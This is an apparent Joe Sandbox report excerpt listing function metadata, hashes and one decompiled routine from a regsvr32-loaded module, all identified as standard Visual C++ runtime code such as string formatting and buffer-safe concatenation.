                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID: Validate$Read$Pointer_inconsistency$Adjust$DecodeExecuteterminate
                                    • String ID:
                                    • API String ID: 801082872-0
                                    • Opcode ID: ac6deabe0a05852b742f22a1b4600818fc4e29af537fcfed8c9e1d4fbe1357d9
                                    • Instruction ID: 9d611a2ef42a4ce54476322da2bce67ea854ec722e2e267300ecfa65af3b148c
                                    • Opcode Fuzzy Hash: ac6deabe0a05852b742f22a1b4600818fc4e29af537fcfed8c9e1d4fbe1357d9
                                    • Instruction Fuzzy Hash: 4DA13D32B0CA4682EAA08B16E89077E67E0F7C4B95F208121DACD877B5DF3ED451CB10
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 000007FEF9D38D00 Relevance: 23.0, APIs: 5, Strings: 8, Instructions: 287COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID: _invalid_parameter
                                    • String ID: $$2 <= radix && radix <= 36$buf != NULL$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\xtoa.c$length < sizeInTChars$sizeInTChars > (size_t)(is_neg ? 2 : 1)$sizeInTChars > 0$xtow_s
                                    • API String ID: 2123368286-1993839260
                                    • Opcode ID: 758167781a4fb66a58f740ebc537b1c9f8383254a932b9fe6e590f504f1f2882
                                    • Instruction ID: 118e4e4707969e3dac6bf015ec0fe9163e407fa4248f5c8d89799a475a93b5a4
                                    • Opcode Fuzzy Hash: 758167781a4fb66a58f740ebc537b1c9f8383254a932b9fe6e590f504f1f2882
                                    • Instruction Fuzzy Hash: 49E11B72A1CB86CAE7A08B18E8447AEB3E1F384755F604525E6CD43BB8DB7ED444CB01
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 000007FEF9D37030 Relevance: 23.0, APIs: 5, Strings: 8, Instructions: 282COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID: _invalid_parameter
                                    • String ID: $$2 <= radix && radix <= 36$buf != NULL$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\xtoa.c$length < sizeInTChars$sizeInTChars > (size_t)(is_neg ? 2 : 1)$sizeInTChars > 0$xtoa_s
                                    • API String ID: 2123368286-1853640030
                                    • Opcode ID: 820d6638ce8c2bc49aeb15d9bb45941f698caf6262644320b28b67af79be84a6
                                    • Instruction ID: 2769aadc75a8f45e94697a4dd9f042802452aa73cd8bd2afe7c03a6eee30acd9
                                    • Opcode Fuzzy Hash: 820d6638ce8c2bc49aeb15d9bb45941f698caf6262644320b28b67af79be84a6
                                    • Instruction Fuzzy Hash: D7E12A32A1DB86CAE7A08B59E8447AEB7E1F385354F604125E6CD43BB8DB7ED444CB01
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 000007FEF9D3E6C6 Relevance: 21.3, APIs: 8, Strings: 4, Instructions: 332COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 22%
                                    			E000007FE7FEF9D3E6C6(signed int __rax, void* __rdx, long long _a32, void* _a64, void* _a72, intOrPtr _a76, signed int _a80, char _a84, short _a86, intOrPtr _a88, long long _a92, long long _a96, signed char _a104, intOrPtr _a108, signed int _a116, char _a120, char _a687, char _a1200, signed short _a1212, intOrPtr _a1216, intOrPtr _a1220, signed char _a1296, signed int _a1304, signed int _a1312, intOrPtr _a1320, long long _a1328, signed char _a1336, intOrPtr _a1340, intOrPtr _a1344, intOrPtr _a1376, intOrPtr _a1380, signed int _a1480, long long _a1488, long long _a1496, long long _a1504, signed int _a1512, intOrPtr _a1536, char _a1560) {
				signed int _t224;
				signed char _t229;
				void* _t260;
				intOrPtr _t268;
				signed int _t342;
				signed int _t343;
				signed long long _t346;
				intOrPtr* _t365;
				intOrPtr* _t370;
				signed long long _t400;

				_t342 = __rax;
				_a80 = _a80 | 0x00000040;
				_a72 = 0xa;
				_a72 = 0xa;
				_a116 = 0x10;
				asm("bts eax, 0xf");
				_a1220 = 7;
				_a1220 = 0x27;
				_a72 = 0x10;
				if ((_a80 & 0x00000080) == 0) goto 0xf9d3e74d;
				_a84 = 0x30;
				_a86 = _a1220 + 0x51;
				_a92 = 2;
				_a72 = 8;
				if ((_a80 & 0x00000080) == 0) goto 0xf9d3e770;
				asm("bts eax, 0x9");
				if ((_a80 & 0x00008000) == 0) goto 0xf9d3e797;
				E000007FE7FEF9D31EA0( &_a1560);
				_a1304 = _t342;
				goto 0xf9d3e844;
				if ((_a80 & 0x00001000) == 0) goto 0xf9d3e7be;
				E000007FE7FEF9D31EA0( &_a1560);
				_a1304 = _t342;
				goto 0xf9d3e844;
				if ((_a80 & 0x00000020) == 0) goto 0xf9d3e809;
				if ((_a80 & 0x00000040) == 0) goto 0xf9d3e7ef;
				_t343 = E000007FE7FEF9D31E40( &_a1560);
				_a1304 = _t343;
				goto 0xf9d3e807;
				E000007FE7FEF9D31E40( &_a1560);
				_a1304 = _t343;
				goto 0xf9d3e844;
				if ((_a80 & 0x00000040) == 0) goto 0xf9d3e82d;
				E000007FE7FEF9D31E40( &_a1560);
				_a1304 = _t343;
				goto 0xf9d3e844;
				E000007FE7FEF9D31E40( &_a1560);
				_a1304 = _t343;
				if ((_a80 & 0x00000040) == 0) goto 0xf9d3e87b;
				if (_a1304 >= 0) goto 0xf9d3e87b;
				_a1312 =  ~_a1304;
				asm("bts eax, 0x8");
				goto 0xf9d3e88b;
				_t346 = _a1304;
				_a1312 = _t346;
				if ((_a80 & 0x00008000) != 0) goto 0xf9d3e8c0;
				if ((_a80 & 0x00001000) != 0) goto 0xf9d3e8c0;
				_a1312 = _a1312 & _t346;
				if (_a116 >= 0) goto 0xf9d3e8d1;
				_a116 = 1;
				goto 0xf9d3e8ee;
				_a80 = _a80 & 0xfffffff7;
				if (_a116 - 0x200 <= 0) goto 0xf9d3e8ee;
				_a116 = 0x200;
				if (_a1312 != 0) goto 0xf9d3e901;
				_a92 = 0;
				_a64 =  &_a687;
				_t224 = _a116;
				_a116 = _a116 - 1;
				if (_t224 > 0) goto 0xf9d3e92f;
				if (_a1312 == 0) goto 0xf9d3e9cc;
				_a1480 = _a72;
				_a1296 = _t224 / _a1480 + 0x30;
				_a1488 = _a72;
				if (_a1296 - 0x39 <= 0) goto 0xf9d3e9ab;
				_t229 = _a1296 + _a1220;
				_a1296 = _t229;
				 *_a64 = _a1296 & 0x000000ff;
				_a64 = _a64 - 1;
				goto 0xf9d3e90e;
				_a104 = _t229;
				_a64 = _a64 + 1;
				if ((_a80 & 0x00000200) == 0) goto 0xf9d3ea2a;
				if (_a104 == 0) goto 0xf9d3ea0b;
				if ( *_a64 == 0x30) goto 0xf9d3ea2a;
				_a64 = _a64 - 1;
				 *_a64 = 0x30;
				_a104 = _a104 + 1;
				if (_a108 != 0) goto 0xf9d3ec7c;
				if ((_a80 & 0x00000040) == 0) goto 0xf9d3ea9d;
				if ((_a80 & 0x00000100) == 0) goto 0xf9d3ea61;
				_a84 = 0x2d;
				_a92 = 1;
				goto 0xf9d3ea9d;
				if ((_a80 & 0x00000001) == 0) goto 0xf9d3ea80;
				_a84 = 0x2b;
				_a92 = 1;
				goto 0xf9d3ea9d;
				if ((_a80 & 0x00000002) == 0) goto 0xf9d3ea9d;
				_a84 = 0x20;
				_a92 = 1;
				_a1320 = _a88 - _a104 - _a92;
				if ((_a80 & 0x0000000c) != 0) goto 0xf9d3eadf;
				E000007FE7FEF9D3EEC0(0x20, _a1320, _a1536,  &_a1200);
				E000007FE7FEF9D3EF10(_a92, _a64,  &_a84, _a1536,  &_a1200);
				if ((_a80 & 0x00000008) == 0) goto 0xf9d3eb33;
				if ((_a80 & 0x00000004) != 0) goto 0xf9d3eb33;
				E000007FE7FEF9D3EEC0(0x30, _a1320, _a1536,  &_a1200);
				if (_a76 != 0) goto 0xf9d3ec29;
				if (_a104 <= 0) goto 0xf9d3ec29;
				_t365 = _a64;
				_a1328 = _t365;
				_a1336 = _a104;
				_a1336 = _a1336 - 1;
				if (_a1336 <= 0) goto 0xf9d3ec27;
				_t260 = E000007FE7FEF9D26840(_a1336,  &_a120);
				_a1496 = _t365;
				E000007FE7FEF9D26840(_t260,  &_a120);
				_a1340 = E000007FE7FEF9D3F000( &_a1212, _a1328,  *((intOrPtr*)( *_t365 + 0x10c)), _a1496);
				if (_a1340 > 0) goto 0xf9d3ebe7;
				_a1200 = 0xffffffff;
				goto 0xf9d3ec27;
				E000007FE7FEF9D3EE40(_a1212 & 0x0000ffff, _a1536,  &_a1200);
				_a1328 = _a1328 + _a1340;
				goto 0xf9d3eb61;
				goto 0xf9d3ec47;
				E000007FE7FEF9D3EF10(_a104, _a1328 + _a1340, _a64, _a1536,  &_a1200);
				if (_a1200 < 0) goto 0xf9d3ec7c;
				if ((_a80 & 0x00000004) == 0) goto 0xf9d3ec7c;
				E000007FE7FEF9D3EEC0(0x20, _a1320, _a1536,  &_a1200);
				if (_a96 == 0) goto 0xf9d3ec9c;
				0xf9d25330();
				_a96 = 0;
				goto 0xf9d3da75;
				if (_a1216 == 0) goto 0xf9d3ecc2;
				if (_a1216 == 7) goto 0xf9d3ecc2;
				_a1504 = 0;
				goto 0xf9d3eccd;
				_a1504 = 1;
				_t268 = _a1504;
				_a1344 = _t268;
				if (_a1344 != 0) goto 0xf9d3ed13;
				_t370 = L"((state == ST_NORMAL) || (state == ST_TYPE))";
				_a32 = _t370;
				r9d = 0;
				r8d = 0x8f5;
				0xf9d2b3b0();
				if (_t268 != 1) goto 0xf9d3ed13;
				asm("int3");
				if (_a1344 != 0) goto 0xf9d3ed6f;
				0xf9d2ab30();
				 *_t370 = 0x16;
				_a32 = 0;
				r9d = 0x8f5;
				E000007FE7FEF9D2BD70(L"((state == ST_NORMAL) || (state == ST_TYPE))", L"_woutput_s_l", L"f:\\dd\\vctools\\crt_bld\\self_64_amd64\\crt\\src\\output.c");
				_a1376 = 0xffffffff;
				E000007FE7FEF9D26800( &_a120);
				goto 0xf9d3ed8e;
				_a1380 = _a1200;
				E000007FE7FEF9D26800( &_a120);
				return E000007FE7FEF9D23280(_a1380, 2, 2, _a1512 ^ _t400, L"_woutput_s_l", L"f:\\dd\\vctools\\crt_bld\\self_64_amd64\\crt\\src\\output.c");
			}













                                    0x7fef9d3e6c6
                                    0x7fef9d3e6cd
                                    0x7fef9d3e6d1
                                    0x7fef9d3e6de
                                    0x7fef9d3e6eb
                                    0x7fef9d3e6f7
                                    0x7fef9d3e6ff
                                    0x7fef9d3e70c
                                    0x7fef9d3e717
                                    0x7fef9d3e72a
                                    0x7fef9d3e731
                                    0x7fef9d3e740
                                    0x7fef9d3e745
                                    0x7fef9d3e74f
                                    0x7fef9d3e762
                                    0x7fef9d3e768
                                    0x7fef9d3e77b
                                    0x7fef9d3e785
                                    0x7fef9d3e78a
                                    0x7fef9d3e792
                                    0x7fef9d3e7a2
                                    0x7fef9d3e7ac
                                    0x7fef9d3e7b1
                                    0x7fef9d3e7b9
                                    0x7fef9d3e7c7
                                    0x7fef9d3e7d2
                                    0x7fef9d3e7e1
                                    0x7fef9d3e7e5
                                    0x7fef9d3e7ed
                                    0x7fef9d3e7f7
                                    0x7fef9d3e7ff
                                    0x7fef9d3e807
                                    0x7fef9d3e812
                                    0x7fef9d3e81c
                                    0x7fef9d3e823
                                    0x7fef9d3e82b
                                    0x7fef9d3e835
                                    0x7fef9d3e83c
                                    0x7fef9d3e84d
                                    0x7fef9d3e858
                                    0x7fef9d3e865
                                    0x7fef9d3e871
                                    0x7fef9d3e879
                                    0x7fef9d3e87b
                                    0x7fef9d3e883
                                    0x7fef9d3e896
                                    0x7fef9d3e8a3
                                    0x7fef9d3e8b8
                                    0x7fef9d3e8c5
                                    0x7fef9d3e8c7
                                    0x7fef9d3e8cf
                                    0x7fef9d3e8d8
                                    0x7fef9d3e8e4
                                    0x7fef9d3e8e6
                                    0x7fef9d3e8f7
                                    0x7fef9d3e8f9
                                    0x7fef9d3e909
                                    0x7fef9d3e90e
                                    0x7fef9d3e918
                                    0x7fef9d3e91e
                                    0x7fef9d3e929
                                    0x7fef9d3e934
                                    0x7fef9d3e957
                                    0x7fef9d3e963
                                    0x7fef9d3e990
                                    0x7fef9d3e9a2
                                    0x7fef9d3e9a4
                                    0x7fef9d3e9b8
                                    0x7fef9d3e9c2
                                    0x7fef9d3e9c7
                                    0x7fef9d3e9d9
                                    0x7fef9d3e9e5
                                    0x7fef9d3e9f5
                                    0x7fef9d3e9fc
                                    0x7fef9d3ea09
                                    0x7fef9d3ea13
                                    0x7fef9d3ea1d
                                    0x7fef9d3ea26
                                    0x7fef9d3ea2f
                                    0x7fef9d3ea3e
                                    0x7fef9d3ea4b
                                    0x7fef9d3ea52
                                    0x7fef9d3ea57
                                    0x7fef9d3ea5f
                                    0x7fef9d3ea6a
                                    0x7fef9d3ea71
                                    0x7fef9d3ea76
                                    0x7fef9d3ea7e
                                    0x7fef9d3ea89
                                    0x7fef9d3ea90
                                    0x7fef9d3ea95
                                    0x7fef9d3eaad
                                    0x7fef9d3eabd
                                    0x7fef9d3eada
                                    0x7fef9d3eaf8
                                    0x7fef9d3eb06
                                    0x7fef9d3eb11
                                    0x7fef9d3eb2e
                                    0x7fef9d3eb38
                                    0x7fef9d3eb43
                                    0x7fef9d3eb49
                                    0x7fef9d3eb4e
                                    0x7fef9d3eb5a
                                    0x7fef9d3eb71
                                    0x7fef9d3eb7a
                                    0x7fef9d3eb85
                                    0x7fef9d3eb8a
                                    0x7fef9d3eb97
                                    0x7fef9d3ebc9
                                    0x7fef9d3ebd8
                                    0x7fef9d3ebda
                                    0x7fef9d3ebe5
                                    0x7fef9d3ebff
                                    0x7fef9d3ec1a
                                    0x7fef9d3ec22
                                    0x7fef9d3ec27
                                    0x7fef9d3ec42
                                    0x7fef9d3ec4f
                                    0x7fef9d3ec5a
                                    0x7fef9d3ec77
                                    0x7fef9d3ec82
                                    0x7fef9d3ec8e
                                    0x7fef9d3ec93
                                    0x7fef9d3ec9c
                                    0x7fef9d3eca9
                                    0x7fef9d3ecb3
                                    0x7fef9d3ecb5
                                    0x7fef9d3ecc0
                                    0x7fef9d3ecc2
                                    0x7fef9d3eccd
                                    0x7fef9d3ecd4
                                    0x7fef9d3ece3
                                    0x7fef9d3ece5
                                    0x7fef9d3ecec
                                    0x7fef9d3ecf1
                                    0x7fef9d3ecf4
                                    0x7fef9d3ed06
                                    0x7fef9d3ed0e
                                    0x7fef9d3ed10
                                    0x7fef9d3ed1b
                                    0x7fef9d3ed1d
                                    0x7fef9d3ed22
                                    0x7fef9d3ed28
                                    0x7fef9d3ed31
                                    0x7fef9d3ed4c
                                    0x7fef9d3ed51
                                    0x7fef9d3ed61
                                    0x7fef9d3ed6d
                                    0x7fef9d3ed76
                                    0x7fef9d3ed82
                                    0x7fef9d3eda5

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID: get_int64_arg
                                    • String ID: ("Incorrect format specifier", 0)$9$_woutput_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                    • API String ID: 1967237116-1983305044
                                    • Opcode ID: 39c1530eb87c93b5c15807e3225054cbc2f74160d6d1f03a50421518d7a029c2
                                    • Instruction ID: 35e4d6cfc5d3e5722aa157ca10994467d352d975a6b38eaa5eb17889d52142ca
                                    • Opcode Fuzzy Hash: 39c1530eb87c93b5c15807e3225054cbc2f74160d6d1f03a50421518d7a029c2
                                    • Instruction Fuzzy Hash: 7AF1D872A0DAC58AE7B18B55E8417AFB7E0F784346F200125E6C987AE9EB7DD440CF50
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 000007FEF9D32D80 Relevance: 21.3, APIs: 4, Strings: 8, Instructions: 310COMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID: _invalid_parameter
                                    • String ID: (((_Src))) != NULL$((_Dst)) != NULL && ((_SizeInWords)) > 0$(L"Buffer is too small" && 0)$(L"String is not null terminated" && 0)$Buffer is too small$String is not null terminated$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\tcscat_s.inl$wcscat_s
                                    • API String ID: 2123368286-3477667311
                                    • Opcode ID: 5284e54803fa5a35f276e18858076b29593f150ab8ed8022a36a7ce25e0bf2f4
                                    • Instruction ID: c8a25613ed3391733179227ae6d5cd1be8fc2ee2dc7f1a1db629f40b2a14394d
                                    • Opcode Fuzzy Hash: 5284e54803fa5a35f276e18858076b29593f150ab8ed8022a36a7ce25e0bf2f4
                                    • Instruction Fuzzy Hash: CAF13832A0DB8685EBE08B19E94476EA3E0F385790F604535D6DE83BA8DF7ED045CB01
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 000007FEF9D369C0 Relevance: 21.3, APIs: 4, Strings: 8, Instructions: 303COMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID: _invalid_parameter
                                    • String ID: (((_Src))) != NULL$((_Dst)) != NULL && ((_SizeInBytes)) > 0$(L"Buffer is too small" && 0)$(L"String is not null terminated" && 0)$Buffer is too small$String is not null terminated$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\tcscat_s.inl$strcat_s
                                    • API String ID: 2123368286-1420200500
                                    • Opcode ID: cc07cef64c5b8afb013f442fd59d1430f3c77c8b5aa073aebe04f881c7874d42
                                    • Instruction ID: 80c7b19323cb8e8402763de004709ed27ed9fdf882d4b7b175d6de3bd1baee6a
                                    • Opcode Fuzzy Hash: cc07cef64c5b8afb013f442fd59d1430f3c77c8b5aa073aebe04f881c7874d42
                                    • Instruction Fuzzy Hash: CDF13A32A0CB8A89EBA08B14E84576EA7E0F385795FA04535D6DD43BE8DB7ED044CB01
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 000007FEF9D3C30D Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 231COMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID: Locale$UpdateUpdate::~__get_printf_count_output_invalid_parameterget_int64_argwctomb_s
                                    • String ID: ("'n' format specifier disabled", 0)$("Incorrect format specifier", 0)$-$_output_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                    • API String ID: 2560055391-3497434347
                                    • Opcode ID: 667eef7f1f49c1d82be4abe5f7b2b6c0360aabec3e49fa9d9e3a648fddbc0f41
                                    • Instruction ID: 0908f7725f90b5cc69585d97bf8e44ac8e860db6174f4101cd143eaefdb7169b
                                    • Opcode Fuzzy Hash: 667eef7f1f49c1d82be4abe5f7b2b6c0360aabec3e49fa9d9e3a648fddbc0f41
                                    • Instruction Fuzzy Hash: 87C11C72A0C7C686E7B1DB64E8457BEB7E4F384785F604025DAC886AA9DB7DE540CF00
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 000007FEF9D39290 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 142COMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID: __doserrno$_invalid_parameter
                                    • String ID: ("Invalid file descriptor. File possibly closed by a different thread",0)$(_osfile(fh) & FOPEN)$(fh >= 0 && (unsigned)fh < (unsigned)_nhandle)$_lseeki64$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\lseeki64.c
                                    • API String ID: 747159061-1442092225
                                    • Opcode ID: 14faf06f4b776b3818928093306a4898f737286e5044e20a730c767404cf7ae4
                                    • Instruction ID: ad53dfe6714ab654120e1b154ee45b7e90274128f767a3acb20d12471acdd345
                                    • Opcode Fuzzy Hash: 14faf06f4b776b3818928093306a4898f737286e5044e20a730c767404cf7ae4
                                    • Instruction Fuzzy Hash: AE617C72A1C646CAE7909B25EC4076E72E1F780765F604725E6ED47AF9DB3EE440CB00
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 000007FEF9D2B12B Relevance: 21.1, APIs: 3, Strings: 9, Instructions: 99COMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID: _exit_invoke_watson_if_error_invoke_watson_if_oneof
                                    • String ID: Module: $(*_errno())$...$Debug %s!Program: %s%s%s%s%s%s%s%s%s%s%s%s(Press Retry to debug the application)$Microsoft Visual C++ Debug Library$_CrtDbgReport: String too long or IO Error$__crtMessageWindowA$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\dbgrpt.c$strcpy_s(szOutMessage, 4096, "_CrtDbgReport: String too long or IO Error")
                                    • API String ID: 1778837556-2487400587
                                    • Opcode ID: 1725f90675b356b8c96096f206fe05692ea700145f07fa5ff60a00d667238266
                                    • Instruction ID: a9706cbd1d0bc1ca6f0e01aa99e4221a5492a8f84fcd1c14ee91e7fca0fd8dc0
                                    • Opcode Fuzzy Hash: 1725f90675b356b8c96096f206fe05692ea700145f07fa5ff60a00d667238266
                                    • Instruction Fuzzy Hash: 5351D376608BC191E774DB18E8803EEB3E1F788384F604126EACD43AA9DB7ED154CB41
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 000007FEF9D3C435 Relevance: 19.6, APIs: 6, Strings: 5, Instructions: 307COMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID: DecodePointer$Locale$UpdateUpdate::~__invalid_parameterwctomb_s
                                    • String ID: ("Incorrect format specifier", 0)$-$_output_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                    • API String ID: 83251219-3442986447
                                    • Opcode ID: a7736ae2d77719cf8dd033ea8b01e94f48993e2d03ef0b45187a851eb092d1a4
                                    • Instruction ID: afb1911e3f8ba5d231fe6bb84017af69377ca2ae416e2d0ba459e573d29e7d3a
                                    • Opcode Fuzzy Hash: a7736ae2d77719cf8dd033ea8b01e94f48993e2d03ef0b45187a851eb092d1a4
                                    • Instruction Fuzzy Hash: 0BF1C87260CBC186E7B1CB25E8947AEB7E4E384785F604125EACD87AA9DB7DD540CF00
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 000007FEF9D407C0 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 141COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID: _invalid_parameter
